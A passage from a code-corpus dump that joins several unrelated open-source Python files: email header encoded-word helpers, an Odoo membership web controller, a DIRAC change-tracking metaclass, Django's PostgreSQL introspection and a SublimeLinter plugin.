_q_byte_map = _QByteMap()
# In headers spaces are mapped to '_'.
_q_byte_map[ord(' ')] = '_'
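# For illustration: encode_q(b'hello world') -> 'hello_world'; a byte
# outside the safe set, such as 0x3D ('='), falls through __missing__
# and becomes '=3D'.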
def encode_q(bstring):
return ''.join(_q_byte_map[x] for x in bstring)
def len_q(bstring):
return sum(len(_q_byte_map[x]) for x in bstring)
#
# Base64
#
def decode_b(encoded):
defects = []
pad_err = len(encoded) % 4
if pad_err:
defects.append(errors.InvalidBase64PaddingDefect())
padded_encoded = encoded + b'==='[:4-pad_err]
else:
padded_encoded = encoded
try:
return base64.b64decode(padded_encoded, validate=True), defects
except binascii.Error:
# Since we had correct padding, this must be an invalid char error.
defects = [errors.InvalidBase64CharactersDefect()]
# The non-alphabet characters are ignored as far as padding
# goes, but we don't know how many there are. So we'll just
# try various padding lengths until something works.
for i in 0, 1, 2, 3:
try:
return base64.b64decode(encoded+b'='*i, validate=False), defects
except binascii.Error:
if i==0:
defects.append(errors.InvalidBase64PaddingDefect())
else:
# This should never happen.
raise AssertionError("unexpected binascii.Error")
def encode_b(bstring):
return base64.b64encode(bstring).decode('ascii')
def len_b(bstring):
groups_of_3, leftover = divmod(len(bstring), 3)
# 4 bytes out for each 3 bytes (or nonzero fraction thereof) in.
return groups_of_3 * 4 + (4 if leftover else 0)
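# For illustration: len_b(b'abcd') == 8, matching b64encode(b'abcd') ==
# b'YWJjZA==' (one full 3-byte group plus one padded partial group).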
_cte_decoders = {
'q': decode_q,
'b': decode_b,
}
def decode(ew):
"""Decode encoded word and return (string, charset, lang, defects) tuple.
An RFC 2047/2243 encoded word has the form:
=?charset*lang?cte?encoded_string?=
where '*lang' may be omitted but the other parts may not be.
This function expects exactly such a string (that is, it does not check the
syntax and may raise errors if the string is not well formed), and returns
the encoded_string decoded first from its Content Transfer Encoding and
then from the resulting bytes into unicode using the specified charset. If
the cte-decoded string does not successfully decode using the specified
character set, a defect is added to the defects list and the unknown octets
are replaced by the unicode 'unknown' character \uFFFD.
The specified charset and language are returned. The default for language,
which is rarely if ever encountered, is the empty string.
"""
_, charset, cte, cte_string, _ = ew.split('?')
charset, _, lang = charset.partition('*')
cte = cte.lower()
# Recover the original bytes and do CTE decoding.
bstring = cte_string.encode('ascii', 'surrogateescape')
bstring, defects = _cte_decoders[cte](bstring)
# Turn the CTE decoded bytes into unicode.
try:
string = bstring.decode(charset)
except UnicodeError:
defects.append(errors.UndecodableBytesDefect("Encoded word "
"contains bytes not decodable using {} charset".format(charset)))
string = bstring.decode(charset, 'surrogateescape')
except LookupError:
string = bstring.decode('ascii', 'surrogateescape')
if charset.lower() != 'unknown-8bit':
defects.append(errors.CharsetError("Unknown charset {} "
"in encoded word; decoded as unknown bytes".format(charset)))
return string, charset, lang, defects
_cte_encoders = {
'q': encode_q,
'b': encode_b,
}
_cte_encode_length = {
'q': len_q,
'b': len_b,
}
def encode(string, charset='utf-8', encoding=None, lang=''):
"""Encode string using the CTE encoding that produces the shorter result.
Produces an RFC 2047/2243 encoded word of the form:
=?charset*lang?cte?encoded_string?=
where '*lang' is omitted unless the 'lang' parameter is given a value.
Optional argument charset (defaults to utf-8) specifies the charset to use
to encode the string to binary before CTE encoding it. Optional argument
'encoding' is the cte specifier for the encoding that should be used ('q'
or 'b'); if it is None (the default) the encoding which produces the
shortest encoded sequence is used, except that 'q' is preferred if it is up
to five characters longer. Optional argument 'lang' (default '') gives the
RFC 2243 language string to specify in the encoded word.
"""
if charset == 'unknown-8bit':
bstring = string.encode('ascii', 'surrogateescape')
else:
bstring = string.encode(charset)
if encoding is None:
qlen = _cte_encode_length['q'](bstring)
blen = _cte_encode_length['b'](bstring)
# Bias toward q. 5 is arbitrary.
encoding = 'q' if qlen - blen < 5 else 'b'
encoded = _cte_encoders[encoding](bstring)
if lang:
lang = '*' + lang
return "=?{}{}?{}?{}?=".format(charset, lang, encoding, encoded)
| lgpl-3.0 |
acshan/odoo | addons/website_membership/controllers/main.py | 18 | 9437 | # -*- coding: utf-8 -*-
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
from openerp.addons.website.models.website import unslug
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT
from openerp.tools.translate import _
import time
import werkzeug.urls
class WebsiteMembership(http.Controller):
_references_per_page = 20
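# number of member references rendered per page by the website pager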
@http.route([
'/members',
'/members/page/<int:page>',
'/members/association/<membership_id>',
'/members/association/<membership_id>/page/<int:page>',
'/members/country/<int:country_id>',
'/members/country/<country_name>-<int:country_id>',
'/members/country/<int:country_id>/page/<int:page>',
'/members/country/<country_name>-<int:country_id>/page/<int:page>',
'/members/association/<membership_id>/country/<country_name>-<int:country_id>',
'/members/association/<membership_id>/country/<int:country_id>',
'/members/association/<membership_id>/country/<country_name>-<int:country_id>/page/<int:page>',
'/members/association/<membership_id>/country/<int:country_id>/page/<int:page>',
], type='http', auth="public", website=True)
def members(self, membership_id=None, country_name=None, country_id=0, page=1, **post):
cr, uid, context = request.cr, request.uid, request.context
product_obj = request.registry['product.product']
country_obj = request.registry['res.country']
membership_line_obj = request.registry['membership.membership_line']
partner_obj = request.registry['res.partner']
post_name = post.get('name', '')
current_country = None
# base domain for groupby / searches
base_line_domain = [("partner.website_published", "=", True), ('state', 'in', ['free', 'paid'])]
if membership_id and membership_id != 'free':
membership_id = int(membership_id)
today = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
base_line_domain += [
('membership_id', '=', membership_id), ('date_to', '>=', today),
('date_from', '<=', today), ('state', '=', 'paid')
]
membership = product_obj.browse(cr, uid, membership_id, context=context)
else:
membership = None
if post_name:
base_line_domain += ['|', ('partner.name', 'ilike', post_name),
('partner.website_description', 'ilike', post_name)]
# group by country, based on all customers (base domain)
if membership_id != 'free':
membership_line_ids = membership_line_obj.search(cr, SUPERUSER_ID, base_line_domain, context=context)
country_domain = [('member_lines', 'in', membership_line_ids)]
else:
membership_line_ids = []
country_domain = [('membership_state', '=', 'free')]
if post_name:
country_domain += ['|', ('name', 'ilike', post_name),
('website_description', 'ilike', post_name)]
countries = partner_obj.read_group(
cr, SUPERUSER_ID, country_domain + [("website_published", "=", True)], ["id", "country_id"],
groupby="country_id", orderby="country_id", context=request.context)
countries_total = sum(country_dict['country_id_count'] for country_dict in countries)
line_domain = list(base_line_domain)
if country_id:
line_domain.append(('partner.country_id', '=', country_id))
current_country = country_obj.read(cr, uid, country_id, ['id', 'name'], context)
if not any(x['country_id'][0] == country_id for x in countries if x['country_id']):
countries.append({
'country_id_count': 0,
'country_id': (country_id, current_country["name"])
})
countries = filter(lambda d:d['country_id'], countries)
countries.sort(key=lambda d: d['country_id'][1])
countries.insert(0, {
'country_id_count': countries_total,
'country_id': (0, _("All Countries"))
})
# format domain for group_by and memberships
membership_ids = product_obj.search(cr, uid, [('membership', '=', True)], order="website_sequence", context=context)
memberships = product_obj.browse(cr, uid, membership_ids, context=context)
# make sure we don't access lines with unpublished memberships
line_domain.append(('membership_id', 'in', membership_ids))
limit = self._references_per_page
offset = limit * (page - 1)
count_members = 0
membership_line_ids = []
# displayed non-free membership lines
if membership_id != 'free':
count_members = membership_line_obj.search_count(cr, SUPERUSER_ID, line_domain, context=context)
if offset <= count_members:
membership_line_ids = tuple(membership_line_obj.search(cr, SUPERUSER_ID, line_domain, offset, limit, context=context))
membership_lines = membership_line_obj.browse(cr, uid, membership_line_ids, context=context)
# TODO: Following line can be deleted in master. Kept for backward compatibility.
membership_lines = sorted(membership_lines, key=lambda x: x.membership_id.website_sequence)
page_partner_ids = set(m.partner.id for m in membership_lines)
google_map_partner_ids = []
if request.env.ref('website_membership.opt_index_google_map').customize_show:
membership_lines_ids = membership_line_obj.search(cr, uid, line_domain, context=context)
google_map_partner_ids = membership_line_obj.get_published_companies(cr, uid, membership_line_ids, limit=2000, context=context)
search_domain = [('membership_state', '=', 'free'), ('website_published', '=', True)]
if post_name:
search_domain += ['|', ('name', 'ilike', post_name), ('website_description', 'ilike', post_name)]
if country_id:
search_domain += [('country_id', '=', country_id)]
free_partner_ids = partner_obj.search(cr, SUPERUSER_ID, search_domain, context=context)
memberships_data = []
for membership_record in memberships:
memberships_data.append({'id': membership_record.id, 'name': membership_record.name})
memberships_partner_ids = {}
for line in membership_lines:
memberships_partner_ids.setdefault(line.membership_id.id, []).append(line.partner.id)
if free_partner_ids:
memberships_data.append({'id': 'free', 'name': _('Free Members')})
if not membership_id or membership_id == 'free':
if count_members < offset + limit:
free_start = max(offset - count_members, 0)
free_end = max(offset + limit - count_members, 0)
memberships_partner_ids['free'] = free_partner_ids[free_start:free_end]
page_partner_ids |= set(memberships_partner_ids['free'])
google_map_partner_ids += free_partner_ids[:2000-len(google_map_partner_ids)]
count_members += len(free_partner_ids)
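        # Worked example (illustrative): with limit=20, offset=0 and 15 paid
        # member lines, free_start is 0 and free_end is 5, so the first five
        # free partners fill the remainder of the page.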
google_map_partner_ids = ",".join(map(str, google_map_partner_ids))
partners = { p.id: p for p in partner_obj.browse(request.cr, SUPERUSER_ID, list(page_partner_ids), request.context)}
base_url = '/members%s%s' % ('/association/%s' % membership_id if membership_id else '',
'/country/%s' % country_id if country_id else '')
# request pager for lines
pager = request.website.pager(url=base_url, total=count_members, page=page, step=limit, scope=7, url_args=post)
values = {
'partners': partners,
'membership_lines': membership_lines, # TODO: This line can be deleted in master. Kept for retrocompatibility.
'memberships': memberships, # TODO: This line too.
'membership': membership, # TODO: This line too.
'memberships_data': memberships_data,
'memberships_partner_ids': memberships_partner_ids,
'membership_id': membership_id,
'countries': countries,
'current_country': current_country and [current_country['id'], current_country['name']] or None,
'current_country_id': current_country and current_country['id'] or 0,
'google_map_partner_ids': google_map_partner_ids,
'pager': pager,
'post': post,
'search': "?%s" % werkzeug.url_encode(post),
}
return request.website.render("website_membership.index", values)
# Do not use semantic controller due to SUPERUSER_ID
@http.route(['/members/<partner_id>'], type='http', auth="public", website=True)
def partners_detail(self, partner_id, **post):
_, partner_id = unslug(partner_id)
if partner_id:
partner = request.registry['res.partner'].browse(request.cr, SUPERUSER_ID, partner_id, context=request.context)
if partner.exists() and partner.website_published:
values = {}
values['main_object'] = values['partner'] = partner
return request.website.render("website_membership.partner", values)
return self.members(**post)
| agpl-3.0 |
fibbo/DIRAC | Core/Utilities/Traced.py | 17 | 3165 | ########################################################################
# $HeadURL $
# File: Traced.py
# Author: Krzysztof.Ciba@NOSPAMgmail.com
# Date: 2012/08/08 13:29:18
########################################################################
"""
:mod: Traced
.. module: Traced
:synopsis: watched mutable metaclass
.. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com
watched mutable metaclass tracing all updated indexes or keys
"""
__RCSID__ = "$Id: $"
##
# @file Traced.py
# @author Krzysztof.Ciba@NOSPAMgmail.com
# @date 2012/08/08 13:29:27
# @brief Definition of Traced metaclass.
########################################################################
class Traced( type ):
"""
.. class:: Traced
  metaclass telling if some attrs were updated
  overwrites __setattr__ and __setitem__
  adds an updated member function and an __update__ attribute
"""
def __new__( cls, cls_name, bases, classdict ):
""" prepare new class instance """
def updated( self, element=None, reset=False ):
""" updates and returns __updated__ list
:param self: self reference
:param mixed element: key name or list index
:param bool reset: flag to zero __updated__ list
:return: __updated__ list when called without arguments
"""
if not self.__update__ or reset:
self.__update__ = list()
      if element is not None and element not in self.__update__:
self.__update__.append( element )
return self.__update__
def trace_setattr( self, name, value ):
""" __setattr__ tracing value update """
#if not name.startswith("_") and name not in dir(self):
# raise AttributeError("'%s' has no attribute '%s'" % ( self.__class__.__name__, name ) )
if name != "__update__":
if not hasattr( self, name ) or getattr( self, name ) != value:
self.updated( name )
bases[0].__setattr__( self, name, value )
def trace_update( self, seq ):
""" for dict only """
for key, value in seq.items():
if key not in self or bases[0].__getitem__( self, key ) != value:
self.updated( key )
      bases[0].update( self, seq )
def trace_append( self, item ):
""" append for list """
self.updated( len(self) )
self += [ item ]
def trace_setitem( self, ind, item ):
""" __setitem__ tracing value update """
if bases[0] == dict and ( ind not in self or bases[0].__getitem__( self, ind ) != item ):
self.updated( ind )
elif bases[0] == list and bases[0].__getitem__( self, ind ) != item:
self.updated( ind )
bases[0].__setitem__( self, ind, item )
classdict["__setattr__"] = trace_setattr
classdict["__setitem__"] = trace_setitem
if bases[0] == dict:
classdict["update"] = trace_update
if bases[0] == list:
classdict["append"] = trace_append
classdict["updated"] = updated
classdict["__update__"] = None
return type.__new__( cls, cls_name, bases, classdict )
class TracedDict(dict):
""" traced dict """
__metaclass__ = Traced
class TracedList(list):
""" traced list """
__metaclass__ = Traced
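# Minimal usage sketch (editor's addition for illustration; not part of the
# original DIRAC module -- it only exercises the classes defined above):
if __name__ == "__main__":
  d = TracedDict()
  d["a"] = 1
  d.update( { "b": 2 } )
  print d.updated()   # ['a', 'b'] -- keys modified since creation
  d.updated( reset=True )  # zero the trace
  l = TracedList( [ 1, 2, 3 ] )
  l[0] = 10
  l.append( 4 )
  print l.updated()   # [0, 3] -- indexes that were changed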
| gpl-3.0 |
shermanng10/superathletebuilder | env/lib/python2.7/site-packages/django/db/backends/postgresql_psycopg2/introspection.py | 119 | 10042 | from __future__ import unicode_literals
from collections import namedtuple
from django.db.backends.base.introspection import (
BaseDatabaseIntrospection, FieldInfo, TableInfo,
)
from django.utils.encoding import force_text
FieldInfo = namedtuple('FieldInfo', FieldInfo._fields + ('default',))
class DatabaseIntrospection(BaseDatabaseIntrospection):
# Maps type codes to Django Field types.
data_types_reverse = {
16: 'BooleanField',
17: 'BinaryField',
20: 'BigIntegerField',
21: 'SmallIntegerField',
23: 'IntegerField',
25: 'TextField',
700: 'FloatField',
701: 'FloatField',
869: 'GenericIPAddressField',
1042: 'CharField', # blank-padded
1043: 'CharField',
1082: 'DateField',
1083: 'TimeField',
1114: 'DateTimeField',
1184: 'DateTimeField',
1266: 'TimeField',
1700: 'DecimalField',
}
ignored_tables = []
def get_field_type(self, data_type, description):
field_type = super(DatabaseIntrospection, self).get_field_type(data_type, description)
if field_type == 'IntegerField' and description.default and 'nextval' in description.default:
return 'AutoField'
return field_type
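    # Illustrative example (editor's note, not from the original module): an
    # integer column (type code 23) whose introspected default reads
    # "nextval('book_id_seq'::regclass)" is reported as an AutoField above.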
def get_table_list(self, cursor):
"""
Returns a list of table and view names in the current database.
"""
cursor.execute("""
SELECT c.relname, c.relkind
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('r', 'v')
AND n.nspname NOT IN ('pg_catalog', 'pg_toast')
AND pg_catalog.pg_table_is_visible(c.oid)""")
return [TableInfo(row[0], {'r': 't', 'v': 'v'}.get(row[1]))
for row in cursor.fetchall()
if row[0] not in self.ignored_tables]
def get_table_description(self, cursor, table_name):
"Returns a description of the table, with the DB-API cursor.description interface."
# As cursor.description does not return reliably the nullable property,
# we have to query the information_schema (#7783)
cursor.execute("""
SELECT column_name, is_nullable, column_default
FROM information_schema.columns
WHERE table_name = %s""", [table_name])
field_map = {line[0]: line[1:] for line in cursor.fetchall()}
cursor.execute("SELECT * FROM %s LIMIT 1" % self.connection.ops.quote_name(table_name))
return [FieldInfo(*((force_text(line[0]),) + line[1:6]
+ (field_map[force_text(line[0])][0] == 'YES', field_map[force_text(line[0])][1])))
for line in cursor.description]
def get_relations(self, cursor, table_name):
"""
Returns a dictionary of {field_name: (field_name_other_table, other_table)}
representing all relationships to the given table.
"""
cursor.execute("""
SELECT c2.relname, a1.attname, a2.attname
FROM pg_constraint con
LEFT JOIN pg_class c1 ON con.conrelid = c1.oid
LEFT JOIN pg_class c2 ON con.confrelid = c2.oid
LEFT JOIN pg_attribute a1 ON c1.oid = a1.attrelid AND a1.attnum = con.conkey[1]
LEFT JOIN pg_attribute a2 ON c2.oid = a2.attrelid AND a2.attnum = con.confkey[1]
WHERE c1.relname = %s
AND con.contype = 'f'""", [table_name])
relations = {}
for row in cursor.fetchall():
relations[row[1]] = (row[2], row[0])
return relations
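    # Illustrative shape of the result (hypothetical names): a mapping like
    # {'author_id': ('id', 'books_author')} means this table's author_id
    # column references books_author.id.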
def get_key_columns(self, cursor, table_name):
key_columns = []
cursor.execute("""
SELECT kcu.column_name, ccu.table_name AS referenced_table, ccu.column_name AS referenced_column
FROM information_schema.constraint_column_usage ccu
LEFT JOIN information_schema.key_column_usage kcu
ON ccu.constraint_catalog = kcu.constraint_catalog
AND ccu.constraint_schema = kcu.constraint_schema
AND ccu.constraint_name = kcu.constraint_name
LEFT JOIN information_schema.table_constraints tc
ON ccu.constraint_catalog = tc.constraint_catalog
AND ccu.constraint_schema = tc.constraint_schema
AND ccu.constraint_name = tc.constraint_name
WHERE kcu.table_name = %s AND tc.constraint_type = 'FOREIGN KEY'""", [table_name])
key_columns.extend(cursor.fetchall())
return key_columns
def get_indexes(self, cursor, table_name):
# This query retrieves each index on the given table, including the
# first associated field name
cursor.execute("""
SELECT attr.attname, idx.indkey, idx.indisunique, idx.indisprimary
FROM pg_catalog.pg_class c, pg_catalog.pg_class c2,
pg_catalog.pg_index idx, pg_catalog.pg_attribute attr
WHERE c.oid = idx.indrelid
AND idx.indexrelid = c2.oid
AND attr.attrelid = c.oid
AND attr.attnum = idx.indkey[0]
AND c.relname = %s""", [table_name])
indexes = {}
for row in cursor.fetchall():
# row[1] (idx.indkey) is stored in the DB as an array. It comes out as
# a string of space-separated integers. This designates the field
# indexes (1-based) of the fields that have indexes on the table.
# Here, we skip any indexes across multiple fields.
if ' ' in row[1]:
continue
if row[0] not in indexes:
indexes[row[0]] = {'primary_key': False, 'unique': False}
# It's possible to have the unique and PK constraints in separate indexes.
if row[3]:
indexes[row[0]]['primary_key'] = True
if row[2]:
indexes[row[0]]['unique'] = True
return indexes
def get_constraints(self, cursor, table_name):
"""
Retrieves any constraints or keys (unique, pk, fk, check, index) across one or more columns.
"""
constraints = {}
# Loop over the key table, collecting things as constraints
# This will get PKs, FKs, and uniques, but not CHECK
cursor.execute("""
SELECT
kc.constraint_name,
kc.column_name,
c.constraint_type,
array(SELECT table_name::text || '.' || column_name::text
FROM information_schema.constraint_column_usage
WHERE constraint_name = kc.constraint_name)
FROM information_schema.key_column_usage AS kc
JOIN information_schema.table_constraints AS c ON
kc.table_schema = c.table_schema AND
kc.table_name = c.table_name AND
kc.constraint_name = c.constraint_name
WHERE
kc.table_schema = %s AND
kc.table_name = %s
ORDER BY kc.ordinal_position ASC
""", ["public", table_name])
for constraint, column, kind, used_cols in cursor.fetchall():
# If we're the first column, make the record
if constraint not in constraints:
constraints[constraint] = {
"columns": [],
"primary_key": kind.lower() == "primary key",
"unique": kind.lower() in ["primary key", "unique"],
"foreign_key": tuple(used_cols[0].split(".", 1)) if kind.lower() == "foreign key" else None,
"check": False,
"index": False,
}
# Record the details
constraints[constraint]['columns'].append(column)
# Now get CHECK constraint columns
cursor.execute("""
SELECT kc.constraint_name, kc.column_name
FROM information_schema.constraint_column_usage AS kc
JOIN information_schema.table_constraints AS c ON
kc.table_schema = c.table_schema AND
kc.table_name = c.table_name AND
kc.constraint_name = c.constraint_name
WHERE
c.constraint_type = 'CHECK' AND
kc.table_schema = %s AND
kc.table_name = %s
""", ["public", table_name])
for constraint, column in cursor.fetchall():
# If we're the first column, make the record
if constraint not in constraints:
constraints[constraint] = {
"columns": [],
"primary_key": False,
"unique": False,
"foreign_key": None,
"check": True,
"index": False,
}
# Record the details
constraints[constraint]['columns'].append(column)
# Now get indexes
cursor.execute("""
SELECT
c2.relname,
ARRAY(
SELECT (SELECT attname FROM pg_catalog.pg_attribute WHERE attnum = i AND attrelid = c.oid)
FROM unnest(idx.indkey) i
),
idx.indisunique,
idx.indisprimary
FROM pg_catalog.pg_class c, pg_catalog.pg_class c2,
pg_catalog.pg_index idx
WHERE c.oid = idx.indrelid
AND idx.indexrelid = c2.oid
AND c.relname = %s
""", [table_name])
for index, columns, unique, primary in cursor.fetchall():
if index not in constraints:
constraints[index] = {
"columns": list(columns),
"primary_key": primary,
"unique": unique,
"foreign_key": None,
"check": False,
"index": True,
}
return constraints
| mit |
bxcn/sublime_plugins | Packages/SublimeLinter/sublimelinter.py | 10 | 15660 | #
# sublimelinter.py
# Part of SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by Ryan Hileman and Aparajita Fishman
#
# Project: https://github.com/SublimeLinter/SublimeLinter3
# License: MIT
#
"""This module provides the SublimeLinter plugin class and supporting methods."""
import os
import re
import sublime
import sublime_plugin
from .lint.linter import Linter
from .lint.highlight import HighlightSet
from .lint.queue import queue
from .lint import persist, util
def plugin_loaded():
"""The ST3 entry point for plugins."""
persist.plugin_is_loaded = True
persist.settings.load()
persist.printf('debug mode:', 'on' if persist.debug_mode() else 'off')
util.create_tempdir()
for linter in persist.linter_classes.values():
linter.initialize()
plugin = SublimeLinter.shared_plugin()
queue.start(plugin.lint)
util.generate_menus()
util.generate_color_scheme(from_reload=False)
persist.settings.on_update_call(SublimeLinter.on_settings_updated)
# This ensures we lint the active view on a fresh install
window = sublime.active_window()
if window:
plugin.on_activated(window.active_view())
class SublimeLinter(sublime_plugin.EventListener):
"""The main ST3 plugin class."""
# We use this to match linter settings filenames.
LINTER_SETTINGS_RE = re.compile('^SublimeLinter(-.+?)?\.sublime-settings')
shared_instance = None
@classmethod
def shared_plugin(cls):
"""Return the plugin instance."""
return cls.shared_instance
def __init__(self, *args, **kwargs):
"""Initialize a new instance."""
super().__init__(*args, **kwargs)
# Keeps track of which views we have assigned linters to
self.loaded_views = set()
# Keeps track of which views have actually been linted
self.linted_views = set()
# A mapping between view ids and syntax names
self.view_syntax = {}
self.__class__.shared_instance = self
@classmethod
def lint_all_views(cls):
"""Simulate a modification of all views, which will trigger a relint."""
def apply(view):
if view.id() in persist.view_linters:
cls.shared_instance.hit(view)
util.apply_to_all_views(apply)
def lint(self, view_id, hit_time=None, callback=None):
"""
Lint the view with the given id.
This method is called asynchronously by queue.Daemon when a lint
request is pulled off the queue.
If provided, hit_time is the time at which the lint request was added
to the queue. It is used to determine if the view has been modified
since the lint request was queued. If so, the lint is aborted, since
another lint request is already in the queue.
callback is the method to call when the lint is finished. If not
provided, it defaults to highlight().
"""
# If the view has been modified since the lint was triggered,
# don't lint again.
if hit_time is not None and persist.last_hit_times.get(view_id, 0) > hit_time:
return
view = Linter.get_view(view_id)
if view is None:
return
filename = view.file_name()
code = Linter.text(view)
callback = callback or self.highlight
Linter.lint_view(view, filename, code, hit_time, callback)
def highlight(self, view, linters, hit_time):
"""
Highlight any errors found during a lint of the given view.
This method is called by Linter.lint_view after linting is finished.
linters is a list of the linters that ran. hit_time has the same meaning
as in lint(), and if the view was modified since the lint request was
made, this method aborts drawing marks.
If the view has not been modified since hit_time, all of the marks and
errors from the list of linters are aggregated and drawn, and the status
is updated.
"""
vid = view.id()
# If the view has been modified since the lint was triggered,
# don't draw marks.
if hit_time is not None and persist.last_hit_times.get(vid, 0) > hit_time:
return
errors = {}
highlights = persist.highlights[vid] = HighlightSet()
for linter in linters:
if linter.highlight:
highlights.add(linter.highlight)
if linter.errors:
for line, errs in linter.errors.items():
errors.setdefault(line, []).extend(errs)
# Keep track of one view in each window that shares view's buffer
window_views = {}
buffer_id = view.buffer_id()
for window in sublime.windows():
wid = window.id()
for other_view in window.views():
if other_view.buffer_id() == buffer_id:
vid = other_view.id()
persist.highlights[vid] = highlights
highlights.clear(other_view)
highlights.draw(other_view)
persist.errors[vid] = errors
if window_views.get(wid) is None:
window_views[wid] = other_view
for view in window_views.values():
self.on_selection_modified_async(view)
def hit(self, view):
"""Record an activity that could trigger a lint and enqueue a desire to lint."""
vid = view.id()
self.check_syntax(view)
self.linted_views.add(vid)
if view.size() == 0:
for linter in Linter.get_linters(vid):
linter.clear()
return
persist.last_hit_times[vid] = queue.hit(view)
def check_syntax(self, view):
"""
Check and return if view's syntax has changed.
If the syntax has changed, a new linter is assigned.
"""
vid = view.id()
syntax = persist.get_syntax(view)
# Syntax either has never been set or just changed
if vid not in self.view_syntax or self.view_syntax[vid] != syntax:
self.view_syntax[vid] = syntax
Linter.assign(view, reset=True)
self.clear(view)
return True
else:
return False
def clear(self, view):
"""Clear all marks, errors and status from the given view."""
Linter.clear_view(view)
def is_scratch(self, view):
"""
Return whether a view is effectively scratch.
There is a bug (or feature) in the current ST3 where the Find panel
is not marked scratch but has no window.
There is also a bug where settings files opened from within .sublime-package
files are not marked scratch during the initial on_modified event, so we have
to check that a view with a filename actually exists on disk if the file
being opened is in the Sublime Text packages directory.
"""
if view.is_scratch() or view.is_read_only() or view.window() is None or view.settings().get("repl") is not None:
return True
elif (
view.file_name() and
view.file_name().startswith(sublime.packages_path() + os.path.sep) and
not os.path.exists(view.file_name())
):
return True
else:
return False
def view_has_file_only_linter(self, vid):
"""Return True if any linters for the given view are file-only."""
for lint in persist.view_linters.get(vid, []):
if lint.tempfile_suffix == '-':
return True
return False
# sublime_plugin.EventListener event handlers
def on_modified(self, view):
"""Called when a view is modified."""
if self.is_scratch(view):
return
if view.id() not in persist.view_linters:
syntax_changed = self.check_syntax(view)
if not syntax_changed:
return
else:
syntax_changed = False
if syntax_changed or persist.settings.get('lint_mode', 'background') == 'background':
self.hit(view)
else:
self.clear(view)
def on_activated(self, view):
"""Called when a view gains input focus."""
if self.is_scratch(view):
return
# Reload the plugin settings.
persist.settings.load()
self.check_syntax(view)
view_id = view.id()
if view_id not in self.linted_views:
if view_id not in self.loaded_views:
self.on_new(view)
if persist.settings.get('lint_mode', 'background') in ('background', 'load/save'):
self.hit(view)
self.on_selection_modified_async(view)
def on_open_settings(self, view):
"""
Called when any settings file is opened.
view is the view that contains the text of the settings file.
"""
if self.is_settings_file(view, user_only=True):
persist.settings.save(view=view)
def is_settings_file(self, view, user_only=False):
"""Return True if view is a SublimeLinter settings file."""
filename = view.file_name()
if not filename:
return False
if not filename.startswith(sublime.packages_path()):
return False
dirname, filename = os.path.split(filename)
dirname = os.path.basename(dirname)
if self.LINTER_SETTINGS_RE.match(filename):
if user_only:
return dirname == 'User'
else:
return dirname in (persist.PLUGIN_DIRECTORY, 'User')
@classmethod
def on_settings_updated(cls, relint=False):
"""Callback triggered when the settings are updated."""
if relint:
cls.lint_all_views()
else:
Linter.redraw_all()
def on_new(self, view):
"""Called when a new buffer is created."""
self.on_open_settings(view)
if self.is_scratch(view):
return
vid = view.id()
self.loaded_views.add(vid)
self.view_syntax[vid] = persist.get_syntax(view)
def get_focused_view_id(self, view):
"""
Return the focused view which shares view's buffer.
When updating the status, we want to make sure we get
the selection of the focused view, since multiple views
into the same buffer may be open.
"""
active_view = view.window().active_view()
for view in view.window().views():
if view == active_view:
return view
def on_selection_modified_async(self, view):
"""Called when the selection changes (cursor moves or text selected)."""
if self.is_scratch(view):
return
view = self.get_focused_view_id(view)
if view is None:
return
vid = view.id()
# Get the line number of the first line of the first selection.
try:
lineno = view.rowcol(view.sel()[0].begin())[0]
except IndexError:
lineno = -1
if vid in persist.errors:
errors = persist.errors[vid]
if errors:
lines = sorted(list(errors))
counts = [len(errors[line]) for line in lines]
count = sum(counts)
plural = 's' if count > 1 else ''
if lineno in errors:
# Sort the errors by column
line_errors = sorted(errors[lineno], key=lambda error: error[0])
line_errors = [error[1] for error in line_errors]
if plural:
# Sum the errors before the first error on this line
index = lines.index(lineno)
first = sum(counts[0:index]) + 1
if len(line_errors) > 1:
last = first + len(line_errors) - 1
status = '{}-{} of {} errors: '.format(first, last, count)
else:
status = '{} of {} errors: '.format(first, count)
else:
status = 'Error: '
status += '; '.join(line_errors)
else:
status = '%i error%s' % (count, plural)
view.set_status('sublimelinter', status)
else:
view.erase_status('sublimelinter')
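    # Illustrative status strings produced above (editor's sketch): with four
    # errors overall and two of them on the current line starting at overall
    # position 2, the status bar reads "2-3 of 4 errors: <msg>; <msg>"; when
    # the cursor is on a clean line it reads "4 errors".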
def on_pre_save(self, view):
"""
Called before view is saved.
If a settings file is the active view and is saved,
copy the current settings first so we can compare post-save.
"""
if view.window().active_view() == view and self.is_settings_file(view):
persist.settings.copy()
def on_post_save(self, view):
"""Called after view is saved."""
if self.is_scratch(view):
return
# First check to see if the project settings changed
if view.window().project_file_name() == view.file_name():
self.lint_all_views()
else:
# Now see if a .sublimelinterrc has changed
filename = os.path.basename(view.file_name())
if filename == '.sublimelinterrc':
# If a .sublimelinterrc has changed, to be safe
# clear the rc cache and relint.
util.get_rc_settings.cache_clear()
self.lint_all_views()
# If a file other than one of our settings files changed,
# check if the syntax changed or if we need to show errors.
elif filename != 'SublimeLinter.sublime-settings':
self.file_was_saved(view)
def file_was_saved(self, view):
"""Check if the syntax changed or if we need to show errors."""
syntax_changed = self.check_syntax(view)
vid = view.id()
mode = persist.settings.get('lint_mode', 'background')
show_errors = persist.settings.get('show_errors_on_save', False)
if syntax_changed:
self.clear(view)
if vid in persist.view_linters:
if mode != 'manual':
self.hit(view)
else:
show_errors = False
else:
show_errors = False
else:
if show_errors:
# if showing errors on save, linting must be synchronized.
self.lint(vid)
elif (
mode in ('load/save', 'save only') or
mode == 'background' and self.view_has_file_only_linter(vid)
):
self.hit(view)
elif mode == 'manual':
show_errors = False
if show_errors and vid in persist.errors and persist.errors[vid]:
view.run_command('sublimelinter_show_all_errors')
def on_close(self, view):
"""Called after view is closed."""
if self.is_scratch(view):
return
vid = view.id()
if vid in self.loaded_views:
self.loaded_views.remove(vid)
if vid in self.linted_views:
self.linted_views.remove(vid)
if vid in self.view_syntax:
del self.view_syntax[vid]
persist.view_did_close(vid)
class SublimelinterEditCommand(sublime_plugin.TextCommand):
"""A plugin command used to generate an edit object for a view."""
def run(self, edit):
"""Run the command."""
persist.edit(self.view.id(), edit)
| mit |
sanjuro/RCJK | vendor/epydoc/util.py | 9 | 14055 | # epydoc -- Utility functions
#
